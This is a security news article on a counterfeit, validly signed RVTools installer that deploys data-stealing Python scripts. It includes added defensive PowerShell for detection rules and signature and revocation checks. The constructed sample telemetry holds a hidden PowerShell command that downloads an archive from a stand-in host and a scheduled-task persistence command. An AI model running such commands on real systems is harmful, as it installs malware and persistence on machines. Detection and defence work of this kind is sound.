A counterfeit installer for RVTools, a utility ubiquitous among VMware administrators, has been circulated by cyber criminals. The fake was signed with a validly issued code-signing certificate, so Windows raised no warning when it was run and the trojanized build passed as the genuine utility.
Exploitation of Trusted Software
RVTools is a staple of enterprise virtualization teams, giving them a complete inventory of their virtual environments, and it is typically run with privileged vCenter credentials. That reputation, and the privileged context it runs in, made it an ideal lure: the people behind the fraudulent installer relied on the trust that enterprises extend to signed software.
K7 Security Labs first identified the campaign. In reports shared with Cyber Security News, it revealed that the rogue installer was signed with a genuine code-signing certificate issued by Sectigo to an entity named Xiamen Lunwei Huage Network Co., Ltd., which appears to be a shell company.
Methodology of the Attack
The attack ran in three stages. In the first, a script hidden in the installer profiled the victim's system and established a covert remote-access channel that beaconed every five minutes. Because the certificate was still valid at the time, the installer passed Windows SmartScreen and other endpoint defenses that treat a valid signature as a trust signal.
The certificate has since been revoked, but revocation only protects endpoints that check it at execution time. Static signature validation, which confirms that the file is intact and chains to a trusted root but never consults the CA's revocation list, would still accept the installer. Note also that an Authenticode signature countersigned by a trusted timestamp continues to validate after revocation unless the CA sets the revocation date before the signing time, so revocation alone is not a reason to stop hunting for this installer.
Consequences and Protective Measures
The installer was a digitally signed MSI file with a standard End-User License Agreement, which together produced a convincing air of legitimacy. Administrators accustomed to signed packages and licence prompts had little reason to question it, and that is precisely what the attackers counted on.
Upon execution, the installer ran a VBScript stored in the MSI's Binary table, with its body encoded to hide its purpose. That script launched a hidden PowerShell process that downloaded a malicious archive in which the harmful scripts were bundled with legitimate applications, so the archive's contents looked benign.
The attack resumed after a reboot with two Python scripts: collector.py gathered detailed system information, and Pmanager.py encrypted that data and transmitted it to remote servers. Persistence was provided by registry entries and scheduled tasks created with elevated privileges, so both scripts survived further reboots.
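The execution chain just described (installer engine, hidden PowerShell, archive under AppData, Python scripts, persistence) is what an endpoint detection rule should key on. The following PowerShell is an added example, not code from the article or from K7 Security Labs: it runs four simple rules over constructed process-creation records whose fields imitate Sysmon Event ID 1, and renders the process ancestry for each hit. Every PID, path, task name and URL in the sample telemetry is made up, and the `/rl highest` switch is only one assumed way a task could be created with elevated privileges.

```powershell
# Added example (not the article's or K7's code): detection logic for the described chain,
# run over constructed process-creation records. All sample values below are invented.

function Get-ImageName([string]$Image) { return (($Image -split '[\\/]')[-1]).ToLowerInvariant() }

function Get-ProcessAncestry {
    param([hashtable]$ByPid, [int]$ProcessId)
    # Walk ParentProcessId links upward and render e.g. "msiexec.exe > powershell.exe > python.exe".
    $chain = @(); $seen = @{}; $cur = $ProcessId
    while ($ByPid.ContainsKey($cur) -and -not $seen.ContainsKey($cur)) {
        $seen[$cur] = $true
        $chain = @(Get-ImageName $ByPid[$cur].Image) + $chain
        $cur = $ByPid[$cur].ParentProcessId
    }
    return ($chain -join ' > ')
}

function Find-RogueInstallerActivity {
    [CmdletBinding()]
    param([Parameter(Mandatory)][object[]]$Events)

    $byPid = @{}
    foreach ($e in $Events) { $byPid[$e.ProcessId] = $e }

    foreach ($e in $Events) {
        $img    = Get-ImageName $e.Image
        $parent = if ($byPid.ContainsKey($e.ParentProcessId)) { Get-ImageName $byPid[$e.ParentProcessId].Image } else { '' }
        $cmd    = $e.CommandLine
        $rules  = @()

        # Rule 1: installer engine or script host spawning a hidden / encoded PowerShell.
        # VBScript custom actions execute inside msiexec.exe, so the parent is usually msiexec itself.
        if ($img -in @('powershell.exe', 'pwsh.exe') -and $parent -in @('msiexec.exe', 'wscript.exe', 'cscript.exe') -and
            $cmd -match '(?i)-w(indowstyle)?\s+h(idden)?\b|-e(c|nc|ncodedcommand)?\s') {
            $rules += 'HiddenPowerShellFromInstaller'
        }
        # Rule 2: the dropped archive the article names, landing under AppData.
        if ($cmd -match '(?i)\\AppData\\.*winp\.zip') { $rules += 'WinpZipInAppData' }
        # Rule 3: Python running the named scripts, or any script out of AppData.
        if ($img -in @('python.exe', 'pythonw.exe') -and $cmd -match '(?i)collector\.py|pmanager\.py|\\AppData\\[^"]*\.py') {
            $rules += 'PythonPayloadFromAppData'
        }
        # Rule 4: persistence via scheduled task creation or a Run-key write.
        if (($img -eq 'schtasks.exe' -and $cmd -match '(?i)/create') -or
            ($img -eq 'reg.exe' -and $cmd -match '(?i)\\CurrentVersion\\Run')) {
            $rules += 'PersistenceCreated'
        }

        foreach ($r in $rules) {
            [pscustomobject]@{
                Rule      = $r
                ProcessId = $e.ProcessId
                Ancestry  = Get-ProcessAncestry -ByPid $byPid -ProcessId $e.ProcessId
                Evidence  = $cmd
            }
        }
    }
}

# Constructed sample telemetry (not real logs): the rogue chain plus two benign look-alikes.
$SampleEvents = @(
    [pscustomobject]@{ ProcessId = 820;  ParentProcessId = 1;    Image = 'C:\Windows\explorer.exe'
        CommandLine = 'explorer.exe' }
    [pscustomobject]@{ ProcessId = 4120; ParentProcessId = 820;  Image = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'msiexec.exe /i C:\Users\admin\Downloads\RVTools.msi' }
    [pscustomobject]@{ ProcessId = 4188; ParentProcessId = 4120; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -WindowStyle Hidden -NoProfile -Command "Invoke-WebRequest http://example.invalid/winp.zip -OutFile C:\Users\admin\AppData\Roaming\winp.zip; Expand-Archive C:\Users\admin\AppData\Roaming\winp.zip C:\Users\admin\AppData\Roaming\winp"' }
    [pscustomobject]@{ ProcessId = 4300; ParentProcessId = 4188; Image = 'C:\Users\admin\AppData\Roaming\winp\python.exe'
        CommandLine = 'python.exe C:\Users\admin\AppData\Roaming\winp\collector.py' }
    [pscustomobject]@{ ProcessId = 4310; ParentProcessId = 4188; Image = 'C:\Windows\System32\schtasks.exe'
        CommandLine = 'schtasks.exe /create /tn Updater /sc onlogon /rl highest /tr "C:\Users\admin\AppData\Roaming\winp\python.exe C:\Users\admin\AppData\Roaming\winp\Pmanager.py"' }
    # Benign: an admin's interactive PowerShell and a developer's build script must not fire.
    [pscustomobject]@{ ProcessId = 5000; ParentProcessId = 820;  Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile' }
    [pscustomobject]@{ ProcessId = 5100; ParentProcessId = 820;  Image = 'C:\Python312\python.exe'
        CommandLine = 'python.exe C:\dev\build.py' }
)

Find-RogueInstallerActivity -Events $SampleEvents | Format-Table -AutoSize -Wrap
```

On the sample data the hidden PowerShell process fires rules 1 and 2, the Python process fires rule 3, and the schtasks call fires rule 4, each with an ancestry string rooted at msiexec.exe; the two benign processes produce nothing. In production the records would come from Sysmon, Windows Security event 4688 with command-line auditing, or an EDR export rather than from an inline array.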
Security Recommendations
Organizations using VMware should obtain RVTools installers only from the official site and verify the signer before installing. Security teams should watch for unexpected files such as winp.zip under the AppData directory and for unusual Python processes. Checking certificate revocation in real time at execution, rather than relying on a one-off signature validation, is essential against attacks of this kind.
Blocking outbound connections from administrative workstations to unrecognized IP addresses adds a further layer of protection. The file hashes and names listed in the IoC section should be fed into monitoring and response tooling.
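The revocation point made earlier and the recommendation above come down to one check that should run before any downloaded installer is executed. The PowerShell below is an added example, not the article's or any vendor's code: `Get-AuthenticodeSignature` establishes that the signature is intact and chains to a trusted root, but it neither pins the publisher nor guarantees an online revocation lookup, so both are done explicitly here. The allow-listed signer name and the installer path are assumptions; fill in the CN you have verified out of band from a known-good copy.

```powershell
# Added example (not the article's code): gate an installer on signature validity,
# a pinned publisher CN, and an online revocation check evaluated as of now.

function Test-TrustedInstaller {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string[]]$AllowedSignerCN   # simple names (CN) the vendor is known to sign with
    )
    $result = [ordered]@{
        Path = $Path; Sha256 = (Get-FileHash -Algorithm SHA256 -Path $Path).Hash   # compare against published IoCs
        Status = 'Unknown'; SignerCN = $null; Revocation = 'NotChecked'; Verdict = 'REJECT'; Reasons = @()
    }

    $sig = Get-AuthenticodeSignature -FilePath $Path
    $result.Status = $sig.Status.ToString()
    if ($sig.Status -ne 'Valid') {
        $result.Reasons += "Signature not valid: $($sig.StatusMessage)"
        return [pscustomobject]$result
    }

    $cert = $sig.SignerCertificate
    $cn = $cert.GetNameInfo([System.Security.Cryptography.X509Certificates.X509NameType]::SimpleName, $false)
    $result.SignerCN = $cn
    # Publisher pinning: a perfectly valid signature from an unexpected company is exactly the
    # case in the article, and no amount of chain validation catches it on its own.
    if ($AllowedSignerCN -notcontains $cn) { $result.Reasons += "Signer '$cn' is not an allow-listed publisher" }

    # Revocation checked as of *now* for the whole chain, failing closed if CRL/OCSP is unreachable.
    # IgnoreNotTimeValid: a timestamped signature may carry a certificate that has since expired;
    # expiry is not the question here, revocation is.
    $chain = [System.Security.Cryptography.X509Certificates.X509Chain]::new()
    $chain.ChainPolicy.RevocationMode      = 'Online'
    $chain.ChainPolicy.RevocationFlag      = 'EntireChain'
    $chain.ChainPolicy.VerificationFlags   = 'IgnoreNotTimeValid'
    $chain.ChainPolicy.UrlRetrievalTimeout = [TimeSpan]::FromSeconds(15)
    $chainOk   = $chain.Build($cert)
    $statusTxt = ($chain.ChainStatus | ForEach-Object { $_.Status.ToString() }) -join ', '

    if ($statusTxt -match '\bRevoked\b') {
        $result.Revocation = 'Revoked'; $result.Reasons += 'Signer certificate has been revoked'
    } elseif ($statusTxt -match 'RevocationStatusUnknown|OfflineRevocation') {
        $result.Revocation = 'Unknown'; $result.Reasons += 'Revocation status could not be confirmed (failing closed)'
    } elseif (-not $chainOk) {
        $result.Revocation = 'ChainError'; $result.Reasons += "Chain did not build: $statusTxt"
    } else {
        $result.Revocation = 'Good'
    }

    if ($result.Reasons.Count -eq 0) { $result.Verdict = 'ALLOW' }
    [pscustomobject]$result
}

# Usage (assumed path and placeholder CN): pin the publisher you verified out of band, then gate on the verdict.
$verdict = Test-TrustedInstaller -Path "$env:USERPROFILE\Downloads\RVTools.msi" -AllowedSignerCN @('REPLACE-WITH-VERIFIED-VENDOR-CN')
$verdict | Format-List
if ($verdict.Verdict -ne 'ALLOW') { Write-Warning 'Do not run this installer.' }
```

Because the chain is evaluated against the current time rather than the signing timestamp, a certificate revoked after the installer was signed is still reported as Revoked here, which is the gap a plain timestamped Authenticode check leaves open. Treat an `Unknown` result as a rejection: an endpoint that cannot reach the CA's revocation endpoint is exactly the environment the article describes as still exposed.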
